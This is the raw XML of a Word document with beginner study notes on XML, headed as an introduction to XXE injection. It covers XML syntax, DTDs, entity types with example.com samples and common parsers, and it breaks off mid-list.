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C024" w14:textId="449A9BAB" w:rsidR="00FA24B1" w:rsidRPr="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XXE Injection – XML External Entity Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5766FAD8" w14:textId="3230C563" w:rsidR="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XML – Extensible Markup Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE9E51" w14:textId="0409D70A" w:rsidR="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>XML is derived from SGML (Standard Generalized Markup Language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D6F92" w14:textId="359CB81F" w:rsidR="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>HTML is based on SGML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C80B9C0" w14:textId="77777777" w:rsidR="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A2C326" w14:textId="7A70F4A2" w:rsidR="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>XML consists of elements, attributes and character data and is used form exchanging data between different systems and applications in a format that’s both human-readable and machine-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6812E8" w14:textId="77777777" w:rsidR="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65654660" w14:textId="59A73630" w:rsidR="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>XML Syntax and structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE11AEC" w14:textId="77777777" w:rsidR="00975F86" w:rsidRPr="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975F86">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D2A4C8" w14:textId="77777777" w:rsidR="00975F86" w:rsidRPr="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975F86">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>&lt;user id="1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0608465B" w14:textId="77777777" w:rsidR="00975F86" w:rsidRPr="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975F86">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">   &lt;name&gt;John&lt;/name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067FBF4B" w14:textId="77777777" w:rsidR="00975F86" w:rsidRPr="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975F86">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">   &lt;age&gt;30&lt;/age&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDA567E" w14:textId="77777777" w:rsidR="00975F86" w:rsidRPr="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975F86">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">   &lt;address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C350D17" w14:textId="77777777" w:rsidR="00975F86" w:rsidRPr="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975F86">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;street&gt;123 Main St&lt;/street&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A442C28" w14:textId="77777777" w:rsidR="00975F86" w:rsidRPr="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975F86">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;city&gt;Anytown&lt;/city&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345EDDAA" w14:textId="77777777" w:rsidR="00975F86" w:rsidRPr="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975F86">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">   &lt;/address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366A8226" w14:textId="77777777" w:rsidR="00975F86" w:rsidRPr="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975F86">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>&lt;/user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D598CC2" w14:textId="77777777" w:rsidR="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE0604C" w14:textId="12DB7CFE" w:rsidR="00975F86" w:rsidRPr="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSLT – Extensible Stylesheet Language Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD10E3" w14:textId="5EB7B94C" w:rsidR="00975F86" w:rsidRDefault="00975F86" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-is used to transform and formats xml documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F27B63" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B4A395" w14:textId="727263F0" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00975F86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DTD – Document Type Definitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C764413" w14:textId="40314117" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-is used for specify the allowed elements, attributes and relationships between them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8EE237" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278832E6" w14:textId="1698F345" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Internal DTD – specified using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00712B0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> declaration, while external DTDs are referenced using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00712B0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533821A7" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DAE549A" w14:textId="75799C5B" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>XML Entities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514A0754" w14:textId="593A61C8" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Internal Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAE85E1" w14:textId="48F2AA08" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>External Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2EA35D" w14:textId="4C86CD79" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Parameter Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEA32C7" w14:textId="0A6BF0C0" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>General Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3CF10F" w14:textId="0D8B434D" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Character Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A280433" w14:textId="56C5ED06" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ex.: External Entity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B11A99" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRPr="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712B0E">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73562051" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRPr="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712B0E">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>&lt;!ENTITY external SYSTEM "http://example.com/test.dtd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A22C13B" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRPr="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712B0E">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;config&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325BCD60" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRPr="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712B0E">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>&amp;external;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E2A6A8" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRPr="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712B0E">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>&lt;/config&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10424B97" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299B7961" w14:textId="2C194D09" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Types of Entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECE81FB" w14:textId="0B2F922B" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00712B0E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Internal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E84A9C7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&lt;!DOCTYPE note [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5272066B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&lt;!ENTITY inf "This is a test."&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6D0984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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2112F435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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2F546A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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;info&gt;&amp;inf;&lt;/info&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C66B6F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&lt;/note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039E56B4" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42AA1B6D" w14:textId="462D0096" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>External Entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F94224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&lt;!DOCTYPE note [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396B2151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 xml:space="preserve">&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>ext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>://example.com/external.dtd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE9E9C7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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BA70D3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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18874052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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;info&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>ext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>;&lt;/info&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BB5266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&lt;/note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F006BF7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</w:p>
    <w:p w14:paraId="5B4A8246" w14:textId="3E8D9DB8" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Parameter Entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236DEC0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&lt;!DOCTYPE note [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0C5686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&lt;!ENTITY % common "CDATA"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A60265F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&lt;!ELEMENT name (%common;)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AD0698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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E2C743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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C035192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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>John Doe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;/name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D2E05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&lt;/note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0892C7E8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</w:p>
    <w:p w14:paraId="19E1EB24" w14:textId="7001415C" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>General Entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764E1CB8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&lt;!DOCTYPE note [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0AB91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&lt;!ENTITY author "John Doe"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB2A2BA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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7919BD97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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8B4C27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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;writer&gt;&amp;author;&lt;/writer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F56F93" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted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&lt;/note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08330664" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473C6180" w14:textId="73809369" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Character Entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D328840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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A1E454" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B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token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;text&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> to represent a less-than </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>symbol.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>/text&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC145A2" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>&lt;/note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F747B87" w14:textId="77777777" w:rsidR="00712B0E" w:rsidRDefault="00712B0E" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16251968" w14:textId="50C26800" w:rsidR="00F21CE2" w:rsidRDefault="00F21CE2" w:rsidP="00712B0E">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Common XML Parsers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E63F55" w14:textId="4F64F233" w:rsidR="00F21CE2" w:rsidRDefault="00F21CE2" w:rsidP="00F21CE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>DOM Parser;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA4E7DB" w14:textId="5E8C02F0" w:rsidR="00F21CE2" w:rsidRDefault="00F21CE2" w:rsidP="00F21CE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>SAX (Simple API for XML) Parser;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E0529" w14:textId="5ED77CE7" w:rsidR="00F21CE2" w:rsidRDefault="00F21CE2" w:rsidP="00F21CE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
